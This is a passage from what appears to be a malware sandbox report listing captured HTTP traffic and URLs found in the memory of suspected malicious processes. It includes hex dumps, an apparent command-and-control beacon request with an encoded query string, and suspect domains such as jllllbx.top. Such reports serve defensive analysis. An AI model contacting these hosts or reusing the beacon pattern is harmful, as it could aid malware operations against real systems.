ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:30 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:17:25 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLiuIp9HcEQPY7hN%2FKJsx3f1DHr3StLqSez%2B7Z1neRXJMz%2BvqB4lxxgIjm9PeCVIbOWNqi5IlrAN0EVTgOsIIWksLBQIvDN9tNv08Cgns2yDYkIwSc6QYnJ4re%2Fwfqc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee246f2a3f2c8d-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRxxn1pXSDSA587GpSj90oPYxzGyveokoLtTkYyVRy1nq0NLpSZ7kFrJLNqIn6fTWk33gkp1aNqSH3WB3KKNZicB7zbDS7bH4TtPmC77q2ftmHXOU3MNflD2NNwQwpo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee247f1b5947a5-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJLK%2Fxikx%2FDcvxx5Jc8gZS9Qy2wWd0K%2Bw7xLJ6%2Fwn348Zk8gVZEB5r1W4a0%2FtSpFjMbZzaUIdnMuRceUCUjGCOEsp5ddzUbwBwAs%2FqUz%2BZP%2FPq0DArsiNzZ37ZNOjSw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee248f0b2e3acc-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1406&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:51:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNQc3uvc2%2FuAsP6zaVcAr%2BhmRhWuSGj1ticct0jl4%2Ft65mYmZ1B9MOZ4%2Fnrng2Q1EwIn%2FliL1UlbwyyrrKU6EczUt1iTBieaxAHkSAGQRblKZ8h%2F06yvTc7ztUeXKF0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee249f0ee56c31-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=512&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 39 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 35 77 39 2f 3f 65 4c 2d 78 3d 41 33 4c 75 74 4f 70 4b 63 41 65 50 65 6c 69 62 4a 6b 58 44 44 59 46 44 4f 2b 41 2f 55 37 6b 58 38 51 77 38 41 49 35 46 38 32 4b 4f 43 72 59 61 42 75 77 2b 78 37 42 44 39 7a 6d 6b 35 6c 56 55 6b 45 63 66 42 4b 56 32 47 49 63 6c 44 76 6f 55 2b 56 39 43 71 30 6d 53 6c 62 34 53 74 70 49 33 39 58 57 59 77 43 2b 6f 77 49 2b 34 65 72 5a 6d 79 77 3d 3d 26 23 78 32 36 3b 77 46 56 48 3d 2d 7a 77 54 4b 50 46 30 69 50 74 68 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: d9<h1>Not Found</h1>The requested URL /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&#x26;wFVH=-zwTKPF0iPth was not found on this server.0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 14:51:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 34 38 0d 0a 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 22 3e e5 8a a0 e8 bd bd e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90 8e 2e 2e 2e 2e 2e 2e 3c 2f 70 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 2c 63 6b 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 66 79 65 72 2e 63 6f 6d 3f 69 64 3d 38 34 35 36 32 22 20 2f 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:52:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2bwu3RGVfgpHLxGPoBFZXm%2FIGgrTB2UMcvWP2SJhqdPKKiiIS138vuBZ%2FCQwVCU%2BfU1v0hditPSuJ9iEk4sOB%2BcMAZDS3pGhPgvTphh6RAIb0OoWzViv5rppS2Ao9Ez6w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee251ead6e2cbe-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 54 c9 8e eb 48 76 dd 37 d0 ff 90 ce 86 51 0d 4b 99 9c 45 4a f9 5e 01 a4 38 68 16 25 51 12 a5 1d 87 20 19 22 19 24 83 c1 31 91 9f e0 7d a3 61 2f ec 85 e1 8d 97 36 ec ff e9 5e d4 5f 18 ca cc 57 55 0f dd b0 17 de 3a 36 c1 3b 9f 7b ee 0d 7e f9 1b 75 3b b5 2e a6 f6 10 91 34 f9 f1 b7 bf f9 72 bf 1f da 34 41 e5 d7 c7 88 90 7c 42 51 4d d3 3c 37 dc 73 86 43 8a 19 8f c7 54 7b f7 79 fc f1 4b 04 1c ff 1e 42 20 49 c0 8f 3c cd 53 3f fd d3 bf ff f4 8f ff fc a7 ff fc fb 3f ff db 1f fe fc 0f ff fa 85 fa 30 fd f6 37 5f 52 40 9c 87 7b be 27 50 54 b0 fe fa 38 cd 10 01 88 3c 59 5d 0e 1e 1f bc 0f e9 eb 23 01 2d a1 ee f9 5f 1e bc c8 c1 25 20 5f 2b 12 3c 49 8f 7f 35 09 06 01 06 65 f4 4b fc 0f c2 cb 43 85 93 af d4 0f 77 ff 92 74 ef d5 dd cc ef 86 3e ac 87 7e 32 f4 c9 d0 f7 87 55 32 cc 92 61 02 87 11 33 8c d8 61 c4 0d 23 7e 18 09 c3 68 34 cc 31 18 7a 99 0f 86 41 86 d3 e1 1d 8f 83 81 33 2c 41 02 3c 32 cc 72 12 e2 ac ca ef 1f 30 43 c3 00 82 c4 2f 01 19 26 20 04 c8 1f e6 43 37 c9 bc b8 a8 32 02 86 24 1a 12 ff 35 75 70 08 d1 84 7e c9 1d df 87 28 9c d0 6f 3f 47 c1 34 7c 75 33 ec 03 3c a1 df aa 77 44 59 f2 9a c0 92 3c bd 83 9f a0 0c 81 b7 bf 00 f9 1a 64 88 3c 95 b0 07 13 86 a6 ff f6 ed a3 f8 ab 97 25 19 9e fc 8e a6 e9 37 88 f2 8a 0c dd 8a 90 0c Data Ascii: a44THv7QKEJ^8h%Q "$1}a/6^_WU:6;{~u;.4r4A|BQM<7sCT{yKB I<S??07_R@{'PT8<Y]#-_% _+<I5eKCwt>~2U2a3a#~h41zA3,A<2r0C/& C72$5up~(o?G4|u3<wDY<d<%7
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:52:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHUpsQX9x3oHguQO0T8TUJU5f3QneL2RGR5ss3rp0jVTb8MOcZAOqEjyzjJk%2FRjk2kyIH%2Bmv8SNKIumEZJOEjgNOKza3E1121%2F4RdyqeeoF2aac2QhfOUcxFeiIcwOyyNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee252e8b923596-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 54 c9 8e eb 48 76 dd 37 d0 ff 90 ce 86 51 0d 4b 99 9c 45 4a f9 5e 01 a4 38 68 16 25 51 12 a5 1d 87 20 19 22 19 24 83 c1 31 91 9f e0 7d a3 61 2f ec 85 e1 8d 97 36 ec ff e9 5e d4 5f 18 ca cc 57 55 0f dd b0 17 de 3a 36 c1 3b 9f 7b ee 0d 7e f9 1b 75 3b b5 2e a6 f6 10 91 34 f9 f1 b7 bf f9 72 bf 1f da 34 41 e5 d7 c7 88 90 7c 42 51 4d d3 3c 37 dc 73 86 43 8a 19 8f c7 54 7b f7 79 fc f1 4b 04 1c ff 1e 42 20 49 c0 8f 3c cd 53 3f fd d3 bf ff f4 8f ff fc a7 ff fc fb 3f ff db 1f fe fc 0f ff fa 85 fa 30 fd f6 37 5f 52 40 9c 87 7b be 27 50 54 b0 fe fa 38 cd 10 01 88 3c 59 5d 0e 1e 1f bc 0f e9 eb 23 01 2d a1 ee f9 5f 1e bc c8 c1 25 20 5f 2b 12 3c 49 8f 7f 35 09 06 01 06 65 f4 4b fc 0f c2 cb 43 85 93 af d4 0f 77 ff 92 74 ef d5 dd cc ef 86 3e ac 87 7e 32 f4 c9 d0 f7 87 55 32 cc 92 61 02 87 11 33 8c d8 61 c4 0d 23 7e 18 09 c3 68 34 cc 31 18 7a 99 0f 86 41 86 d3 e1 1d 8f 83 81 33 2c 41 02 3c 32 cc 72 12 e2 ac ca ef 1f 30 43 c3 00 82 c4 2f 01 19 26 20 04 c8 1f e6 43 37 c9 bc b8 a8 32 02 86 24 1a 12 ff 35 75 70 08 d1 84 7e c9 1d df 87 28 9c d0 6f 3f 47 c1 34 7c 75 33 ec 03 3c a1 df aa 77 44 59 f2 9a c0 92 3c bd 83 9f a0 0c 81 b7 bf 00 f9 1a 64 88 3c 95 b0 07 13 86 a6 ff f6 ed a3 f8 ab 97 25 19 9e fc 8e a6 e9 37 88 f2 8a 0c dd 8a 90 0c fd 6f Data Ascii: a44THv7QKEJ^8h%Q "$1}a/6^_WU:6;{~u;.4r4A|BQM<7sCT{yKB I<S??07_R@{'PT8<Y]#-_% _+<I5eKCwt>~2U2a3a#~h41zA3,A<2r0C/& C72$5up~(o?G4|u3<wDY<d<%7o
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:52:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wx%2B6ht8u4hyiYbYz3k9Gm3SlEEsO2%2FCDfAMBI97WHASOPFRYcQxbkiGdHcpEj%2BciGKcL7cuel%2BUEboyIuf7qqgbRoh6Hk%2FiY5QPdsg14xk7T0HobDBEStrLyR7aX%2FMZxiw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee253e7e1f6b2f-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1801&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 84 53 cb 6e db 46 14 dd 07 c8 3f a8 0a 8a 04 cd 50 24 45 3d 2c d2 0e 20 4b 96 e3 58 b6 94 58 72 d2 ec 86 e4 25 39 f6 70 66 34 1c ea 41 81 9f d0 7d 51 b4 8b 76 51 74 d3 65 8b f6 7f 92 45 fe a2 20 29 c7 16 52 b4 ab 99 b9 af 73 ee b9 77 0e bf 1a 4e 06 b3 6f a7 27 b5 48 c5 f4 c5 e3 47 87 c5 59 5b c7 94 25 47 f5 48 29 61 eb fa 6a b5 6a ac ac 06 97 a1 6e f6 7a 3d 7d 5d c4 d4 5f 1c 46 80 fd 22 45 11 45 e1 45 cb 68 e9 9f 7e fe e3 d3 4f bf 7c f8 eb bb 8f bf 7f ff f1 c7 df 0e f5 ca f5 f8 d1 61 0c 0a d7 8a 7a 1a 2c 52 b2 3c aa 0f 38 53 c0 94 36 db 08 a8 d7 bc ea 75 54 57 b0 56 7a 51 df a9 79 11 96 09 a8 a3 54 05 da 41 fd 5f 8b 48 08 24 24 d1 7d fe d3 b6 53 4b 25 3d d2 9f 16 f1 89 da 94 e8 2e f7 37 c8 27 4b e4 53 e4 2b e4 fb 28 a5 88 53 44 09 8a 4c 14 35 51 64 a1 a8 85 a2 36 8a 3a 48 48 40 1e f7 01 05 5c c6 a8 e0 83 25 60 94 00 05 4f 21 2e 54 28 79 2a 8a 0b e1 0c 05 04 a8 9f 80 42 14 42 60 3e 12 c8 a5 dc bb 5d a4 5c 01 52 11 52 fe 36 c6 32 24 cc 36 1c 81 7d 9f b0 d0 36 f2 cf 59 24 0e b7 2e 97 3e 48 db c8 d3 92 11 a7 5b 4a 12 a5 95 e4 6d c6 19 e4 5f 90 dc 06 9c 29 2d 21 19 d8 a6 61 7c 9d 57 e0 5b 8f 53 2e ed 27 86 61 e4 84 89 54 21 37 55 8a b3 ff 6b a2 aa 16 e0 98 d0 8d 4d 58 04 92 28 e7 1e 61 df 52 b2 da 33 ad 80 Data Ascii: 461SnF?P$E=, KXXr%9pf4A}QvQteE )RswNo'HGY[%GH)ajjnz=}]_F"EEEh~O|az,R<8S6uTWVzQyTA_H$$}SK%=.7'KS+(SDL5Qd6:HH@\%`O!.T(y*BB`>]\RR62$6}6Y$.>H[Jm_)-!a|W[S.'aT!7UkMX(aR3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 14:52:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3aVldNir6MSLrNhkt4pj0D6kS7J%2FRcfXH209pBJ9lmQ%2F8NMbYI1zs2jcdc%2B0vHj7jtY29lqQlQSxYexdIc6zob3MAhxaFIOPW4b5dQL%2F0A0ryBtl0XF9p3AFbWi%2BaLBvqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dee254e6821b78c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=514&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 65 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 2f e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 2f 27 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 2c 64 69 76 2c 64 6c 2c 64 74 2c 64 64 2c 75 6c 2c 6f 6c 2c 6c 69 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 72 65 2c 63 6f 64 65 2c 66 6f 72 6d 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 66 69 65 6c 64 73 65 74 2c 6c 65 67 65 6e 64 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 74 68 2c 74 64 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 66 69 65 6c 64 73 65 74 2c 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 75 6c 2c 6c 69 2c 6f 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 66 6f 6e Data Ascii: 1e86<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404/</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="refresh" content='5; url=/'><style>body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,textarea,select,optgroup,option,fieldset,legend,p,blockquote,th,td{margin:0;padding:0}fieldset,img{border:0}ul,li,ol{list-style:none}h1,h2,h3,h4,h5,h6{fon
                Source: Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gmo.jp/images/public/common/logo.gif
                Source: avRLXQyosx.exe, 00000008.00000002.3166059888.00000000054DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jllllbx.top
                Source: avRLXQyosx.exe, 00000008.00000002.3166059888.00000000054DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jllllbx.top/14ny/
                Source: Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onamae-server.com/
                Source: Atuserer.exe, 00000007.00000002.3165412212.0000000005A6E000.00000004.10000000.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000002.3164252655.0000000003BCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.onamae.com/?banner_id=634
